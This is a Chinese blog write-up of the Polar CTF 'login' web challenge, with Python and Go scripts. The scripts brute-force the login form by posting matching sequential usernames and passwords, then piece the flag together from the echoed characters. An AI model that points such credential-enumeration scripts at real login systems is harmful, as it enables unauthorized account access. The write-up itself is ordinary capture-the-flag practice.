-
Polar Web【简单】login
Polar Web【简单】login
本文旨在记录此题的探索和解决过程。
探索&思路
- 查看源码,发现存在用户信息泄露。
- 尝试用获取信息登录,显示成功,但其后没有可做的操作。
- 经尝试,
username和password同时递增也会登录成功,并回显一些字符。经过拼凑发现,结果即为目标flag。
具体情况可参考下图:
EXP
Python
import requests if __name__ == '__main__': for i in range(20200102, 20200120): # 此题不一定需要 headers = { "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", } # 构造用户名和密码 data = { "username": f"{i}", "password": f"{i}", } # 发出POST请求 res = requests.post('http://~.www.polarctf.com:8090/', data=data, headers=headers) out = str(res.content.decode('utf8')) # # 确认目标字符的下标 # print(out.rindex('f') - len(out)) # 每次输出目标字符 print(out[-5], end='')Go
package main import ( "fmt" "io/ioutil" "net/http" "net/url" "strconv" ) func main() { for i := 20200102; i <= 20200111; i ++ { urlV := url.Values{} urlV.Add("username", strconv.Itoa(i)) urlV.Add("password", strconv.Itoa(i)) resp, err := http.PostForm( "http://~.www.polarctf.com:8090/", urlV, ) if err != nil { _ = fmt.Errorf("%v", "POST ERR") } // 读取响应体 body, err := ioutil.ReadAll(resp.Body) if err != nil { _ = fmt.Errorf("读取响应体失败: %v", err) } out := string(body) //fmt.Println(strings.LastIndex(out, "f")) // 504 fmt.Print(string(out[504])) } fmt.Println() }结果&总结
- 本题如果少了必要的探索过程,难以知悉有这样的爆破思路
- 同时尝试了独立用脚本实现爆破过程
-
相关阅读:
有哪些免费好用的API接口,一文告诉你
一个简单证件照的设计过程
jeecg-boot简单使用
3 ThreadLocal-TransmittableThreadLocal
人工智能学习之机器人路径规划优化
【力扣】面试经典150题——哈希表
10月13日上课内容 Ansible 的脚本 --- playbook 剧本
创建数据库表及修改删除数据表字段
信息系统项目管理-组织级项目管理-十八
微信小程序:(更新)云开发微群人脉
- 原文地址:https://blog.csdn.net/weixin_45987327/article/details/139394578